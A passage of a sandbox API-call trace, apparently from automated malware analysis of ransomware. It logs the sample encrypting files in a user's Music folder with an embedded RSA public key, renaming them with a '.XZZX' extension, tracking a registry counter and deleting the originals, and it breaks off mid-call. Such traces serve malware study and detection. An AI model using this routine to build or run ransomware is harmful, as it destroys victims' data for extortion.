0x7720e124 [0051.847] CryptDestroyKey (hKey=0x3e28838) returned 1 [0051.847] CryptReleaseContext (hProv=0x3e43970, dwFlags=0x0) returned 0 [0051.847] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\C8E8BDDC263509ECACA7C0D62A50EE34.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\c8e8bddc263509ecaca7c0d62a50ee34.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5f8 [0051.848] WriteFile (in: hFile=0x5f8, lpBuffer=0x43855e0*, nNumberOfBytesToWrite=0x14558, lpNumberOfBytesWritten=0x41be438, lpOverlapped=0x0 | out: lpBuffer=0x43855e0*, lpNumberOfBytesWritten=0x41be438*=0x14558, lpOverlapped=0x0) returned 1 [0051.849] SetFilePointer (in: hFile=0x5f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x14558 [0051.849] WriteFile (in: hFile=0x5f8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x41be438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x41be438*=0x5, lpOverlapped=0x0) returned 1 [0051.849] SetFilePointer (in: hFile=0x5f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1455d [0051.849] WriteFile (in: hFile=0x5f8, lpBuffer=0x41bf860*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x41be438, lpOverlapped=0x0 | out: lpBuffer=0x41bf860*, lpNumberOfBytesWritten=0x41be438*=0x1e, lpOverlapped=0x0) returned 1 [0051.849] SetFilePointer (in: hFile=0x5f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1457b [0051.849] WriteFile (in: hFile=0x5f8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x41be438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x41be438*=0x5, lpOverlapped=0x0) returned 1 [0051.849] SetFilePointer (in: hFile=0x5f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x14580 [0051.849] SetErrorMode (uMode=0x1) returned 0x1 [0051.849] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0051.849] OutputDebugStringW (lpOutputString="end") [0051.850] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----w°I/\x04`Õ\x1b\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x41bdbf4, pcbBinary=0x41bd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x41bdbf4, pcbBinary=0x41bd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0051.850] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x41bdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x41bd3dc, pcbStructInfo=0x41bd3d8 | out: pvStructInfo=0x41bd3dc, pcbStructInfo=0x41bd3d8) returned 1 [0051.850] CryptAcquireContextW (in: phProv=0x41bd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x41bd3e4*=0x4399e88) returned 1 [0051.850] CryptImportPublicKeyInfo (in: hCryptProv=0x4399e88, dwCertEncodingType=0x1, pInfo=0x3e40b50*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e40b80*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e40b88*, PublicKey.cUnusedBits=0x0), phKey=0x41bd3ec | out: phKey=0x41bd3ec*=0x3e28838) returned 1 [0051.850] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0051.851] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0051.851] CryptEncrypt (in: hKey=0x3e28838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x41bd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x41bd3f0*=0x80) returned 1 [0051.851] CryptEncrypt (in: hKey=0x3e28838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4399f10*, pdwDataLen=0x41bd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x4399f10*, pdwDataLen=0x41bd3e8*=0x80) returned 1 [0051.851] WriteFile (in: hFile=0x5f8, lpBuffer=0x4399f10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x41be438, lpOverlapped=0x0 | out: lpBuffer=0x4399f10*, lpNumberOfBytesWritten=0x41be438*=0x80, lpOverlapped=0x0) returned 1 [0051.851] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0051.851] WriteFile (in: hFile=0x5f8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x41be438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x41be438*=0x5, lpOverlapped=0x0) returned 1 [0051.851] GetUserNameW (in: lpBuffer=0x41be1f8, pcbBuffer=0x41bdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x41bdfe0) returned 1 [0051.852] wsprintfW (in: param_1=0x41bdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0051.852] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x41bdfe4 | out: phkResult=0x41bdfe4*=0x610) returned 0x0 [0051.852] RegQueryValueExW (in: hKey=0x610, lpValueName="E1010314", lpReserved=0x0, lpType=0x41bdfd8, lpData=0x41bdfec, lpcbData=0x41bdfdc*=0x4 | out: lpType=0x41bdfd8*=0x4, lpData=0x41bdfec*=0x5e, lpcbData=0x41bdfdc*=0x4) returned 0x0 [0051.852] RegCloseKey (hKey=0x610) returned 0x0 [0051.852] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x41bdfe8 | out: phkResult=0x41bdfe8*=0x610) returned 0x0 [0051.852] RegSetValueExW (in: hKey=0x610, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x41bdfec*=0x5f, cbData=0x4 | out: lpData=0x41bdfec*=0x5f) returned 0x0 [0051.852] RegCloseKey (hKey=0x610) returned 0x0 [0051.852] VirtualFree (lpAddress=0x46d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0051.853] VirtualFree (lpAddress=0x46e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0051.853] CloseHandle (hObject=0x5f8) returned 1 [0051.855] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0051.856] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0051.856] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\6Fs5O-wZK5i.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\6fs5o-wzk5i.m4a")) returned 0 [0051.856] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\6Fs5O-wZK5i.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\6fs5o-wzk5i.m4a")) returned 0 Thread: id = 190 os_tid = 0xb38 [0052.007] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0052.007] lstrcpyW (in: lpString1=0x417f460, lpString2="9tkObc3F16FjSYiAwFD.wav" | out: lpString1="9tkObc3F16FjSYiAwFD.wav") returned="9tkObc3F16FjSYiAwFD.wav" [0052.007] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0052.007] SetErrorMode (uMode=0x1) returned 0x1 [0052.007] lstrcpyW (in: lpString1=0x417f860, lpString2="9tkObc3F16FjSYiAwFD.wav" | out: lpString1="9tkObc3F16FjSYiAwFD.wav") returned="9tkObc3F16FjSYiAwFD.wav" [0052.007] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0x70d6498a, Data2=0x31cc, Data3=0x4586, Data4=([0]=0x83, [1]=0x2b, [2]=0xe1, [3]=0xc3, [4]=0x75, [5]=0x9c, [6]=0x70, [7]=0xdf))) returned 0x0 [0052.007] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9tkObc3F16FjSYiAwFD.wav") returned 82 [0052.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0052.007] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\EED603F80D860CC870D6498A119DF110.XZZX") returned 96 [0052.007] StrStrW (lpFirst="9tkObc3F16FjSYiAwFD.wav", lpSrch="XZZX") returned 0x0 [0052.007] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9tkObc3F16FjSYiAwFD.wav", dwFileAttributes=0x20) returned 1 [0052.008] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9tkObc3F16FjSYiAwFD.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9tkobc3f16fjsyiawfd.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x62c [0052.008] ReadFile (in: hFile=0x62c, lpBuffer=0x4306348, nNumberOfBytesToRead=0x16440, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x4306348*, lpNumberOfBytesRead=0x417e418*=0x16440, lpOverlapped=0x0) returned 1 [0052.009] CloseHandle (hObject=0x62c) returned 1 [0052.009] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e90000 [0052.010] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ea0000 [0052.010] SetErrorMode (uMode=0x1) returned 0x1 [0052.010] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0052.010] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x4399f98) returned 1 [0052.012] CryptGenKey (in: hProv=0x4399f98, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3e288b8) returned 1 [0052.142] CryptExportKey (in: hKey=0x3e288b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0052.142] CryptExportKey (in: hKey=0x3e288b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ea0000, pdwDataLen=0x417e41c | out: pbData=0x3ea0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0052.142] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0052.142] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0052.142] CryptDestroyKey (hKey=0x3e288b8) returned 1 [0052.143] CryptReleaseContext (hProv=0x4399f98, dwFlags=0x0) returned 1 [0052.143] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\EED603F80D860CC870D6498A119DF110.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\eed603f80d860cc870d6498a119df110.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x62c [0052.144] WriteFile (in: hFile=0x62c, lpBuffer=0x4306348*, nNumberOfBytesToWrite=0x16440, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x4306348*, lpNumberOfBytesWritten=0x417e438*=0x16440, lpOverlapped=0x0) returned 1 [0052.145] SetFilePointer (in: hFile=0x62c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x16440 [0052.145] WriteFile (in: hFile=0x62c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0052.145] SetFilePointer (in: hFile=0x62c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x16445 [0052.145] WriteFile (in: hFile=0x62c, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x2e, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x2e, lpOverlapped=0x0) returned 1 [0052.145] SetFilePointer (in: hFile=0x62c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x16473 [0052.145] WriteFile (in: hFile=0x62c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0052.146] SetFilePointer (in: hFile=0x62c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x16478 [0052.146] SetErrorMode (uMode=0x1) returned 0x1 [0052.146] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0052.146] OutputDebugStringW (lpOutputString="end") [0052.146] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----w°I/\x04`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0052.146] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0052.146] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x4399f98) returned 1 [0052.147] CryptImportPublicKeyInfo (in: hCryptProv=0x4399f98, dwCertEncodingType=0x1, pInfo=0x42e14a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x42e14d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x42e14d8*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x3e28938) returned 1 [0052.147] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0052.148] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0052.148] CryptEncrypt (in: hKey=0x3e28938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0052.148] CryptEncrypt (in: hKey=0x3e28938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x439a020*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x439a020*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0052.148] WriteFile (in: hFile=0x62c, lpBuffer=0x439a020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x439a020*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0052.148] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0052.148] WriteFile (in: hFile=0x62c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0052.148] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0052.148] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0052.148] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x620) returned 0x0 [0052.148] RegQueryValueExW (in: hKey=0x620, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x5f, lpcbData=0x417dfdc*=0x4) returned 0x0 [0052.148] RegCloseKey (hKey=0x620) returned 0x0 [0052.148] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x620) returned 0x0 [0052.149] RegSetValueExW (in: hKey=0x620, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x60, cbData=0x4 | out: lpData=0x417dfec*=0x60) returned 0x0 [0052.149] RegCloseKey (hKey=0x620) returned 0x0 [0052.149] VirtualFree (lpAddress=0x3e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0052.149] VirtualFree (lpAddress=0x3ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0052.149] CloseHandle (hObject=0x62c) returned 1 [0052.151] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0052.151] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0052.151] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9tkObc3F16FjSYiAwFD.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9tkobc3f16fjsyiawfd.wav")) returned 1 [0052.152] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9tkObc3F16FjSYiAwFD.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9tkobc3f16fjsyiawfd.wav")) returned 0 Thread: id = 191 os_tid = 0xb58 [0052.163] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0052.163] lstrcpyW (in: lpString1=0x417f460, lpString2="aF_IB.m4a" | out: lpString1="aF_IB.m4a") returned="aF_IB.m4a" [0052.163] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0052.163] SetErrorMode (uMode=0x1) returned 0x1 [0052.164] lstrcpyW (in: lpString1=0x417f860, lpString2="aF_IB.m4a" | out: lpString1="aF_IB.m4a") returned="aF_IB.m4a" [0052.165] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0xb7533aa1, Data2=0x1f94, Data3=0x48bd, Data4=([0]=0xa3, [1]=0x7a, [2]=0x3f, [3]=0x32, [4]=0x6b, [5]=0xe2, [6]=0x30, [7]=0x2e))) returned 0x0 [0052.165] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\aF_IB.m4a") returned 68 [0052.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0052.165] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\1037641408F8F044B7533AA10D10D48C.XZZX") returned 96 [0052.165] StrStrW (lpFirst="aF_IB.m4a", lpSrch="XZZX") returned 0x0 [0052.165] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\aF_IB.m4a", dwFileAttributes=0x20) returned 1 [0052.165] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\aF_IB.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\af_ib.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0052.166] ReadFile (in: hFile=0x610, lpBuffer=0x42e9eb8, nNumberOfBytesToRead=0x3dc4, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x42e9eb8*, lpNumberOfBytesRead=0x417e418*=0x3dc4, lpOverlapped=0x0) returned 1 [0052.166] CloseHandle (hObject=0x610) returned 1 [0052.166] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e90000 [0052.167] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ea0000 [0052.167] SetErrorMode (uMode=0x1) returned 0x1 [0052.167] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0052.167] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft 